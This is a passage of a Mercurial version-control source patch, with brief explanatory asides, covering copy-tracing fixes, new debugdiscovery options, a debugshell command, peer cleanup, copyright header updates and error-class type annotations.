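            del y_copies[k]
    assert x_copies == {'c': 'a'} and y_copies == {}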
@@ -1042,11 +1110,17 @@
b" discovered dir src: '%s' -> dst: '%s'\n" % (d, dirmove[d])
)
+ # Sort the directories in reverse order, so we find children first
+ # For example, if dir1/ was renamed to dir2/, and dir1/subdir1/
+ # was renamed to dir2/subdir2/, we want to move dir1/subdir1/file
+ # to dir2/subdir2/file (not dir2/subdir1/file)
+ dirmove_children_first = sorted(dirmove, reverse=True)
+
movewithdir = {}
# check unaccounted nonoverlapping files against directory moves
for f in addedfilesfn():
if f not in fullcopy:
- for d in dirmove:
+ for d in dirmove_children_first:
if f.startswith(d):
# new file added in a directory that was moved, move it
df = dirmove[d] + f[len(d) :]
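Why the reverse sort matters: with a nested rename, the parent directory is also a valid prefix of the file, so trying the deepest prefix first is what routes the file into the renamed subdirectory. A standalone check:

    dirmove = {
        'dir1/': 'dir2/',
        'dir1/subdir1/': 'dir2/subdir2/',
    }

    def dest(f, order):
        for d in order:
            if f.startswith(d):
                return dirmove[d] + f[len(d):]

    f = 'dir1/subdir1/file'
    assert dest(f, sorted(dirmove, reverse=True)) == 'dir2/subdir2/file'
    assert dest(f, sorted(dirmove)) == 'dir2/subdir1/file'  # the wrong answer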
@@ -1220,6 +1294,15 @@
by merge.update().
"""
new_copies = pathcopies(base, ctx)
- _filter(wctx.p1(), wctx, new_copies)
+ parent = wctx.p1()
+ _filter(parent, wctx, new_copies)
+ # Extra filtering to drop copy information for files that existed before
+ # the graft. This is to handle the case of grafting a rename onto a commit
+ # that already has the rename. Otherwise the presence of copy information
+ # would result in the creation of an empty commit where we would prefer to
+ # not create one.
+ for dest, __ in list(new_copies.items()):
+ if dest in parent:
+ del new_copies[dest]
for dst, src in pycompat.iteritems(new_copies):
wctx[dst].markcopied(src)
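The extra graft-time filtering above, as a plain dict operation: any copy whose destination already exists in the graft target's parent is dropped, since recording it again would only produce an otherwise-empty commit:

    new_copies = {'b': 'a', 'c': 'a'}
    parent_files = {'b'}   # 'b' already exists (and is tracked) in p1
    for dest in list(new_copies):
        if dest in parent_files:
            del new_copies[dest]   # rename already present in the parent
    assert new_copies == {'c': 'a'}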
--- a/mercurial/dagop.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dagop.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dagop.py - graph ancestry and topology algorithm for revset
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/debugcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/debugcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# debugcommands.py - command processing for debug* commands
#
-# Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2016 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -9,6 +9,7 @@
import codecs
import collections
+import contextlib
import difflib
import errno
import glob
@@ -69,6 +70,7 @@
pycompat,
registrar,
repair,
+ repoview,
revlog,
revset,
revsetlang,
@@ -96,6 +98,7 @@
dateutil,
procutil,
stringutil,
+ urlutil,
)
from .revlogutils import (
@@ -345,7 +348,7 @@
def showchunks(named):
ui.write(b"\n%s%s\n" % (indent_string, named))
for deltadata in gen.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
ui.write(
b"%s%s %s %s %s %s %d\n"
% (
@@ -371,7 +374,7 @@
raise error.Abort(_(b'use debugbundle2 for this file'))
gen.changelogheader()
for deltadata in gen.deltaiter():
- node, p1, p2, cs, deltabase, delta, flags = deltadata
+ node, p1, p2, cs, deltabase, delta, flags, sidedata = deltadata
ui.write(b"%s%s\n" % (indent_string, hex(node)))
@@ -470,27 +473,47 @@
"""lists the capabilities of a remote peer"""
opts = pycompat.byteskwargs(opts)
peer = hg.peer(ui, opts, path)
- caps = peer.capabilities()
- ui.writenoi18n(b'Main capabilities:\n')
- for c in sorted(caps):
- ui.write(b' %s\n' % c)
- b2caps = bundle2.bundle2caps(peer)
- if b2caps:
- ui.writenoi18n(b'Bundle2 capabilities:\n')
- for key, values in sorted(pycompat.iteritems(b2caps)):
- ui.write(b' %s\n' % key)
- for v in values:
- ui.write(b' %s\n' % v)
-
-
-@command(b'debugchangedfiles', [], b'REV')
-def debugchangedfiles(ui, repo, rev):
+ try:
+ caps = peer.capabilities()
+ ui.writenoi18n(b'Main capabilities:\n')
+ for c in sorted(caps):
+ ui.write(b' %s\n' % c)
+ b2caps = bundle2.bundle2caps(peer)
+ if b2caps:
+ ui.writenoi18n(b'Bundle2 capabilities:\n')
+ for key, values in sorted(pycompat.iteritems(b2caps)):
+ ui.write(b' %s\n' % key)
+ for v in values:
+ ui.write(b' %s\n' % v)
+ finally:
+ peer.close()
+
+
+@command(
+ b'debugchangedfiles',
+ [
+ (
+ b'',
+ b'compute',
+ False,
+ b"compute information instead of reading it from storage",
+ ),
+ ],
+ b'REV',
+)
+def debugchangedfiles(ui, repo, rev, **opts):
"""list the stored files changes for a revision"""
ctx = scmutil.revsingle(repo, rev, None)
- sd = repo.changelog.sidedata(ctx.rev())
- files_block = sd.get(sidedata.SD_FILES)
- if files_block is not None:
- files = metadata.decode_files_sidedata(sd)
+ files = None
+
+ if opts['compute']:
+ files = metadata.compute_all_files_changes(ctx)
+ else:
+ sd = repo.changelog.sidedata(ctx.rev())
+ files_block = sd.get(sidedata.SD_FILES)
+ if files_block is not None:
+ files = metadata.decode_files_sidedata(sd)
+ if files is not None:
for f in sorted(files.touched):
if f in files.added:
action = b"added"
@@ -964,20 +987,111 @@
),
(b'', b'rev', [], b'restrict discovery to this set of revs'),
(b'', b'seed', b'12323', b'specify the random seed use for discovery'),
+ (
+ b'',
+ b'local-as-revs',
+ b"",
+ b'treat local as having these revisions only',
+ ),
+ (
+ b'',
+ b'remote-as-revs',
+ b"",
+ b'use local as remote, with only these revisions',
+ ),
]
- + cmdutil.remoteopts,
+ + cmdutil.remoteopts
+ + cmdutil.formatteropts,
_(b'[--rev REV] [OTHER]'),
)
def debugdiscovery(ui, repo, remoteurl=b"default", **opts):
- """runs the changeset discovery protocol in isolation"""
+ """runs the changeset discovery protocol in isolation
+
+ The local peer can be "replaced" by a subset of the local repository by
+ using the `--local-as-revs` flag. In the same way, the usual `remote` peer
+ can be "replaced" by a subset of the local repository using the
+ `--remote-as-revs` flag. This is useful to efficiently debug pathological
+ discovery situations.
+
+ The following developer-oriented config options are relevant for people playing with this command:
+
+ * devel.discovery.exchange-heads=True
+
+ If False, the discovery will not start with
+ remote head fetching and local head querying.
+
+ * devel.discovery.grow-sample=True
+
+ If False, the sample size used in set discovery will not be increased
+ through the process.
+
+ * devel.discovery.grow-sample.dynamic=True
+
+ When discovery.grow-sample.dynamic is True, the default, the sample size is
+ adapted to the shape of the undecided set (it is set to the max of:
+ <target-size>, len(roots(undecided)), len(heads(undecided)))
+
+ * devel.discovery.grow-sample.rate=1.05
+
+ The rate at which the sample grows.
+
+ * devel.discovery.randomize=True
+
+ If False, random sampling during discovery is deterministic. It is meant
+ for integration tests.
+
+ * devel.discovery.sample-size=200
+
+ Control the initial size of the discovery sample
+
+ * devel.discovery.sample-size.initial=100
+
+ Control the sample size used in the first discovery round
+ """
opts = pycompat.byteskwargs(opts)
- remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
- remote = hg.peer(repo, opts, remoteurl)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl))
+ unfi = repo.unfiltered()
+
+ # setup potential extra filtering
+ local_revs = opts[b"local_as_revs"]
+ remote_revs = opts[b"remote_as_revs"]
# make sure tests are repeatable
random.seed(int(opts[b'seed']))
+ if not remote_revs:
+
+ remoteurl, branches = urlutil.get_unique_pull_path(
+ b'debugdiscovery', repo, ui, remoteurl
+ )
+ remote = hg.peer(repo, opts, remoteurl)
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl))
+ else:
+ branches = (None, [])
+ remote_filtered_revs = scmutil.revrange(
+ unfi, [b"not (::(%s))" % remote_revs]
+ )
+ remote_filtered_revs = frozenset(remote_filtered_revs)
+
+ def remote_func(x):
+ return remote_filtered_revs
+
+ repoview.filtertable[b'debug-discovery-remote-filter'] = remote_func
+
+ remote = repo.peer()
+ remote._repo = remote._repo.filtered(b'debug-discovery-remote-filter')
+
+ if local_revs:
+ local_filtered_revs = scmutil.revrange(
+ unfi, [b"not (::(%s))" % local_revs]
+ )
+ local_filtered_revs = frozenset(local_filtered_revs)
+
+ def local_func(x):
+ return local_filtered_revs
+
+ repoview.filtertable[b'debug-discovery-local-filter'] = local_func
+ repo = repo.filtered(b'debug-discovery-local-filter')
+
data = {}
if opts.get(b'old'):
@@ -1014,8 +1128,21 @@
remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
localrevs = opts[b'rev']
- with util.timedcm('debug-discovery') as t:
- common, hds = doit(localrevs, remoterevs)
+
+ fm = ui.formatter(b'debugdiscovery', opts)
+ if fm.strict_format:
+
+ @contextlib.contextmanager
+ def may_capture_output():
+ ui.pushbuffer()
+ yield
+ data[b'output'] = ui.popbuffer()
+
+ else:
+ may_capture_output = util.nullcontextmanager
+ with may_capture_output():
+ with util.timedcm('debug-discovery') as t:
+ common, hds = doit(localrevs, remoterevs)
# compute all statistics
heads_common = set(common)
@@ -1066,50 +1193,41 @@
data[b'nb-ini_und-common'] = len(common_initial_undecided)
data[b'nb-ini_und-missing'] = len(missing_initial_undecided)
+ fm.startitem()
+ fm.data(**pycompat.strkwargs(data))
# display discovery summary
- ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data)
- ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data)
- ui.writenoi18n(b"heads summary:\n")
- ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data)
- ui.writenoi18n(
- b" also local heads: %(nb-common-heads-local)9d\n" % data
- )
- ui.writenoi18n(
- b" also remote heads: %(nb-common-heads-remote)9d\n" % data
- )
- ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data)
- ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data)
- ui.writenoi18n(
- b" common: %(nb-common-heads-local)9d\n" % data
- )
- ui.writenoi18n(
- b" missing: %(nb-head-local-missing)9d\n" % data
- )
- ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data)
- ui.writenoi18n(
- b" common: %(nb-common-heads-remote)9d\n" % data
- )
- ui.writenoi18n(
- b" unknown: %(nb-head-remote-unknown)9d\n" % data
- )
- ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data)
- ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data)
- ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-missing-roots)9d\n" % data)
- ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data)
- ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data)
- ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data)
- ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data)
- ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data)
+ fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data)
+ fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data)
+ fm.plain(b"heads summary:\n")
+ fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data)
+ fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data)
+ fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data)
+ fm.plain(b" both: %(nb-common-heads-both)9d\n" % data)
+ fm.plain(b" local heads: %(nb-head-local)9d\n" % data)
+ fm.plain(b" common: %(nb-common-heads-local)9d\n" % data)
+ fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data)
+ fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data)
+ fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data)
+ fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data)
+ fm.plain(b"local changesets: %(nb-revs)9d\n" % data)
+ fm.plain(b" common: %(nb-revs-common)9d\n" % data)
+ fm.plain(b" heads: %(nb-common-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-common-roots)9d\n" % data)
+ fm.plain(b" missing: %(nb-revs-missing)9d\n" % data)
+ fm.plain(b" heads: %(nb-missing-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-missing-roots)9d\n" % data)
+ fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data)
+ fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data)
+ fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data)
+ fm.plain(b" common: %(nb-ini_und-common)9d\n" % data)
+ fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data)
if ui.verbose:
- ui.writenoi18n(
+ fm.plain(
b"common heads: %s\n"
% b" ".join(sorted(short(n) for n in heads_common))
)
+ fm.end()
_chunksize = 4 << 10
@@ -2214,9 +2332,9 @@
b'',
b'dump-new',
False,
- _(b'write a (new) persistent binary nodemap on stdin'),
+ _(b'write a (new) persistent binary nodemap on stdout'),
),
- (b'', b'dump-disk', False, _(b'dump on-disk data on stdin')),
+ (b'', b'dump-disk', False, _(b'dump on-disk data on stdout')),
(
b'',
b'check',
@@ -2546,12 +2664,17 @@
with ui.configoverride(overrides):
peer = hg.peer(ui, {}, path)
- local = peer.local() is not None
- canpush = peer.canpush()
-
- ui.write(_(b'url: %s\n') % peer.url())
- ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no')))
- ui.write(_(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no')))
+ try:
+ local = peer.local() is not None
+ canpush = peer.canpush()
+
+ ui.write(_(b'url: %s\n') % peer.url())
+ ui.write(_(b'local: %s\n') % (_(b'yes') if local else _(b'no')))
+ ui.write(
+ _(b'pushable: %s\n') % (_(b'yes') if canpush else _(b'no'))
+ )
+ finally:
+ peer.close()
@command(
@@ -2654,26 +2777,30 @@
"""
target = hg.peer(ui, {}, repopath)
- if keyinfo:
- key, old, new = keyinfo
- with target.commandexecutor() as e:
- r = e.callcommand(
- b'pushkey',
- {
- b'namespace': namespace,
- b'key': key,
- b'old': old,
- b'new': new,
- },
- ).result()
-
- ui.status(pycompat.bytestr(r) + b'\n')
- return not r
- else:
- for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))):
- ui.write(
- b"%s\t%s\n" % (stringutil.escapestr(k), stringutil.escapestr(v))
- )
+ try:
+ if keyinfo:
+ key, old, new = keyinfo
+ with target.commandexecutor() as e:
+ r = e.callcommand(
+ b'pushkey',
+ {
+ b'namespace': namespace,
+ b'key': key,
+ b'old': old,
+ b'new': new,
+ },
+ ).result()
+
+ ui.status(pycompat.bytestr(r) + b'\n')
+ return not r
+ else:
+ for k, v in sorted(pycompat.iteritems(target.listkeys(namespace))):
+ ui.write(
+ b"%s\t%s\n"
+ % (stringutil.escapestr(k), stringutil.escapestr(v))
+ )
+ finally:
+ target.close()
@command(b'debugpvec', [], _(b'A B'))
@@ -3527,8 +3654,10 @@
)
source = b"default"
- source, branches = hg.parseurl(ui.expandpath(source))
- url = util.url(source)
+ source, branches = urlutil.get_unique_pull_path(
+ b'debugssl', repo, ui, source
+ )
+ url = urlutil.url(source)
defaultport = {b'https': 443, b'ssh': 22}
if url.scheme in defaultport:
@@ -3636,8 +3765,14 @@
for backup in backups:
# Much of this is copied from the hg incoming logic
- source = ui.expandpath(os.path.relpath(backup, encoding.getcwd()))
- source, branches = hg.parseurl(source, opts.get(b"branch"))
+ source = os.path.relpath(backup, encoding.getcwd())
+ source, branches = urlutil.get_unique_pull_path(
+ b'debugbackupbundle',
+ repo,
+ ui,
+ source,
+ default_branches=opts.get(b'branch'),
+ )
try:
other = hg.peer(repo, opts, source)
except error.LookupError as ex:
@@ -3719,6 +3854,23 @@
ui.writenoi18n(b' revision %s\n' % v[1])
+@command(b'debugshell', optionalrepo=True)
+def debugshell(ui, repo):
+ """run an interactive Python interpreter
+
+ The local namespace is provided with a reference to the ui and
+ the repo instance (if available).
+ """
+ import code
+
+ imported_objects = {
+ 'ui': ui,
+ 'repo': repo,
+ }
+
+ code.interact(local=imported_objects)
+
+
@command(
b'debugsuccessorssets',
[(b'', b'closest', False, _(b'return closest successors sets only'))],
@@ -3779,10 +3931,19 @@
def debugtagscache(ui, repo):
"""display the contents of .hg/cache/hgtagsfnodes1"""
cache = tagsmod.hgtagsfnodescache(repo.unfiltered())
+ flog = repo.file(b'.hgtags')
for r in repo:
node = repo[r].node()
tagsnode = cache.getfnode(node, computemissing=False)
- tagsnodedisplay = hex(tagsnode) if tagsnode else b'missing/invalid'
+ if tagsnode:
+ tagsnodedisplay = hex(tagsnode)
+ if not flog.hasnode(tagsnode):
+ tagsnodedisplay += b' (unknown node)'
+ elif tagsnode is None:
+ tagsnodedisplay = b'missing'
+ else:
+ tagsnodedisplay = b'invalid'
+
ui.write(b'%d %s %s\n' % (r, hex(node), tagsnodedisplay))
@@ -4000,19 +4161,22 @@
def debugwireargs(ui, repopath, *vals, **opts):
opts = pycompat.byteskwargs(opts)
repo = hg.peer(ui, opts, repopath)
- for opt in cmdutil.remoteopts:
- del opts[opt[1]]
- args = {}
- for k, v in pycompat.iteritems(opts):
- if v:
- args[k] = v
- args = pycompat.strkwargs(args)
- # run twice to check that we don't mess up the stream for the next command
- res1 = repo.debugwireargs(*vals, **args)
- res2 = repo.debugwireargs(*vals, **args)
- ui.write(b"%s\n" % res1)
- if res1 != res2:
- ui.warn(b"%s\n" % res2)
+ try:
+ for opt in cmdutil.remoteopts:
+ del opts[opt[1]]
+ args = {}
+ for k, v in pycompat.iteritems(opts):
+ if v:
+ args[k] = v
+ args = pycompat.strkwargs(args)
+ # run twice to check that we don't mess up the stream for the next command
+ res1 = repo.debugwireargs(*vals, **args)
+ res2 = repo.debugwireargs(*vals, **args)
+ ui.write(b"%s\n" % res1)
+ if res1 != res2:
+ ui.warn(b"%s\n" % res2)
+ finally:
+ repo.close()
def _parsewirelangblocks(fh):
@@ -4372,7 +4536,7 @@
# We bypass hg.peer() so we can proxy the sockets.
# TODO consider not doing this because we skip
# ``hg.wirepeersetupfuncs`` and potentially other useful functionality.
- u = util.url(path)
+ u = urlutil.url(path)
if u.scheme != b'http':
raise error.Abort(_(b'only http:// paths are currently supported'))
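The `--local-as-revs` / `--remote-as-revs` handling above works by registering
throwaway entries in `repoview.filtertable`: each entry maps a filter name to
a function returning the frozenset of revision numbers to hide, so the
filtered view behaves as if the repository only contained the requested
subset. A minimal sketch of the same pattern, assuming an existing `repo`
object (the filter name and revspec below are illustrative)::

    from mercurial import repoview, scmutil

    def register_subset_filter(repo, name, revspec):
        # Hide everything that is not an ancestor of `revspec`, so the
        # filtered view acts like a repo containing only `::revspec`.
        hidden = frozenset(
            scmutil.revrange(repo.unfiltered(), [b"not (::(%s))" % revspec])
        )
        repoview.filtertable[name] = lambda unfi: hidden
        return repo.filtered(name)

    subset = register_subset_filter(repo, b'example-subset', b'tip~10')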
--- a/mercurial/destutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/destutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# destutil.py - Mercurial utility function for command destination
#
-# Copyright Matt Mackall <mpm@selenic.com> and other
+# Copyright Olivia Mackall <olivia@selenic.com> and other
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/diffhelper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/diffhelper.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# diffhelper.py - helper routines for patch
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/dirstate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dirstate.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dirstate.py - working directory tracking for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -73,13 +73,16 @@
@interfaceutil.implementer(intdirstate.idirstate)
class dirstate(object):
- def __init__(self, opener, ui, root, validate, sparsematchfn):
+ def __init__(
+ self, opener, ui, root, validate, sparsematchfn, nodeconstants
+ ):
"""Create a new dirstate object.
opener is an open()-like callable that can be used to open the
dirstate file; root is the root of the directory tracked by
the dirstate.
"""
+ self._nodeconstants = nodeconstants
self._opener = opener
self._validate = validate
self._root = root
@@ -136,7 +139,9 @@
@propertycache
def _map(self):
"""Return the dirstate contents (see documentation for dirstatemap)."""
- self._map = self._mapcls(self._ui, self._opener, self._root)
+ self._map = self._mapcls(
+ self._ui, self._opener, self._root, self._nodeconstants
+ )
return self._map
@property
@@ -1425,12 +1430,13 @@
denormalized form that they appear as in the dirstate.
"""
- def __init__(self, ui, opener, root):
+ def __init__(self, ui, opener, root, nodeconstants):
self._ui = ui
self._opener = opener
self._root = root
self._filename = b'dirstate'
self._nodelen = 20
+ self._nodeconstants = nodeconstants
self._parents = None
self._dirtyparents = False
@@ -1729,7 +1735,8 @@
if rustmod is not None:
class dirstatemap(object):
- def __init__(self, ui, opener, root):
+ def __init__(self, ui, opener, root, nodeconstants):
+ self._nodeconstants = nodeconstants
self._ui = ui
self._opener = opener
self._root = root
--- a/mercurial/dirstateguard.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dirstateguard.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dirstateguard.py - class to allow restoring dirstate after failure
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/discovery.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/discovery.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# discovery.py - protocol changeset discovery functions
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -270,9 +270,12 @@
# C. Update newmap with outgoing changes.
# This will possibly add new heads and remove existing ones.
newmap = branchmap.remotebranchcache(
- (branch, heads[1])
- for branch, heads in pycompat.iteritems(headssum)
- if heads[0] is not None
+ repo,
+ (
+ (branch, heads[1])
+ for branch, heads in pycompat.iteritems(headssum)
+ if heads[0] is not None
+ ),
)
newmap.update(repo, (ctx.rev() for ctx in missingctx))
for branch, newheads in pycompat.iteritems(newmap):
--- a/mercurial/dispatch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/dispatch.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# dispatch.py - command dispatching for mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -50,6 +50,7 @@
from .utils import (
procutil,
stringutil,
+ urlutil,
)
@@ -990,7 +991,7 @@
lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path)
if rpath:
- path = lui.expandpath(rpath)
+ path = urlutil.get_clone_path(lui, rpath)[0]
lui = ui.copy()
if rcutil.use_repo_hgrc():
_readsharedsourceconfig(lui, path)
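The hunk above replaces `lui.expandpath(rpath)` with
`urlutil.get_clone_path(lui, rpath)[0]`. Judging from the call sites in this
patch (index 0 here, index 1 for a clone destination, and a three-way unpack
in hg.clone() further down), the helper returns a three-element tuple; the
shape below is inferred from those usages rather than from documentation::

    from mercurial.utils import urlutil

    # Inferred: (expanded source, normalized url, (branch, branches)).
    origsource, source, branches = urlutil.get_clone_path(ui, source)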
--- a/mercurial/encoding.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/encoding.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# encoding.py - character transcoding support for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/error.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/error.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# error.py - Mercurial exceptions
#
-# Copyright 2005-2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -20,7 +20,13 @@
if pycompat.TYPE_CHECKING:
from typing import (
+ Any,
+ AnyStr,
+ Iterable,
+ List,
Optional,
+ Sequence,
+ Union,
)
@@ -60,6 +66,7 @@
class SidedataHashError(RevlogError):
def __init__(self, key, expected, got):
+ self.hint = None
self.sidedatakey = key
self.expecteddigest = expected
self.actualdigest = got
@@ -77,9 +84,9 @@
# Python 2.6+ complain about the 'message' property being deprecated
self.lookupmessage = message
if isinstance(name, bytes) and len(name) == 20:
- from .node import short
+ from .node import hex
- name = short(name)
+ name = hex(name)
# if name is a binary node, it can be None
RevlogError.__init__(
self, b'%s@%s: %s' % (index, pycompat.bytestr(name), message)
@@ -108,6 +115,7 @@
"""Exception raised on errors in parsing the command line."""
def __init__(self, command, message):
+ # type: (bytes, bytes) -> None
self.command = command
self.message = message
super(CommandError, self).__init__()
@@ -119,6 +127,7 @@
"""Exception raised if command is not in the command table."""
def __init__(self, command, all_commands=None):
+ # type: (bytes, Optional[List[bytes]]) -> None
self.command = command
self.all_commands = all_commands
super(UnknownCommand, self).__init__()
@@ -130,6 +139,7 @@
"""Exception raised if command shortcut matches more than one command."""
def __init__(self, prefix, matches):
+ # type: (bytes, List[bytes]) -> None
self.prefix = prefix
self.matches = matches
super(AmbiguousCommand, self).__init__()
@@ -141,6 +151,7 @@
"""Exception raised when a worker process dies."""
def __init__(self, status_code):
+ # type: (int) -> None
self.status_code = status_code
# Pass status code to superclass just so it becomes part of __bytes__
super(WorkerError, self).__init__(status_code)
@@ -158,6 +169,7 @@
"""Exception raised when a continuable command required merge conflict resolution."""
def __init__(self, opname):
+ # type: (bytes) -> None
from .i18n import _
self.opname = opname
@@ -193,6 +205,7 @@
return pycompat.sysstr(self.__bytes__())
def format(self):
+ # type: () -> bytes
from .i18n import _
message = _(b"abort: %s\n") % self.message
@@ -246,10 +259,12 @@
"""Exception raised when parsing config files"""
def __init__(self, message, location=None, hint=None):
+ # type: (bytes, Optional[bytes], Optional[bytes]) -> None
super(ConfigError, self).__init__(message, hint=hint)
self.location = location
def format(self):
+ # type: () -> bytes
from .i18n import _
if self.location is not None:
@@ -289,20 +304,34 @@
Abort.__init__(self, _(b'response expected'))
-class OutOfBandError(Hint, Exception):
+class RemoteError(Abort):
+ """Exception raised when interacting with a remote repo fails"""
+
+
+class OutOfBandError(RemoteError):
"""Exception raised when a remote repo reports failure"""
- __bytes__ = _tobytes
+ def __init__(self, message=None, hint=None):
+ from .i18n import _
+
+ if message:
+ # Abort.format() adds a trailing newline
+ message = _(b"remote error:\n%s") % message.rstrip(b'\n')
+ else:
+ message = _(b"remote error")
+ super(OutOfBandError, self).__init__(message, hint=hint)
class ParseError(Abort):
"""Raised when parsing config files and {rev,file}sets (msg[, pos])"""
def __init__(self, message, location=None, hint=None):
+ # type: (bytes, Optional[Union[bytes, int]], Optional[bytes]) -> None
super(ParseError, self).__init__(message, hint=hint)
self.location = location
def format(self):
+ # type: () -> bytes
from .i18n import _
if self.location is not None:
@@ -322,6 +351,7 @@
def getsimilar(symbols, value):
+ # type: (Iterable[bytes], bytes) -> List[bytes]
sim = lambda x: difflib.SequenceMatcher(None, value, x).ratio()
# The cutoff for similarity here is pretty arbitrary. It should
# probably be investigated and tweaked.
@@ -329,6 +359,7 @@
def similarity_hint(similar):
+ # type: (List[bytes]) -> Optional[bytes]
from .i18n import _
if len(similar) == 1:
@@ -344,6 +375,7 @@
"""Exception raised when a {rev,file}set references an unknown identifier"""
def __init__(self, function, symbols):
+ # type: (bytes, Iterable[bytes]) -> None
from .i18n import _
similar = getsimilar(symbols, function)
@@ -378,6 +410,7 @@
"""Raised if I/O to stdout or stderr fails"""
def __init__(self, err):
+ # type: (IOError) -> None
IOError.__init__(self, err.errno, err.strerror)
# no __bytes__() because error message is derived from the standard IOError
@@ -385,6 +418,7 @@
class UnsupportedMergeRecords(Abort):
def __init__(self, recordtypes):
+ # type: (Iterable[bytes]) -> None
from .i18n import _
self.recordtypes = sorted(recordtypes)
@@ -403,12 +437,15 @@
"""generic exception for aborting from an encounter with an unknown version"""
def __init__(self, msg, hint=None, version=None):
+ # type: (bytes, Optional[bytes], Optional[bytes]) -> None
self.version = version
super(UnknownVersion, self).__init__(msg, hint=hint)
class LockError(IOError):
def __init__(self, errno, strerror, filename, desc):
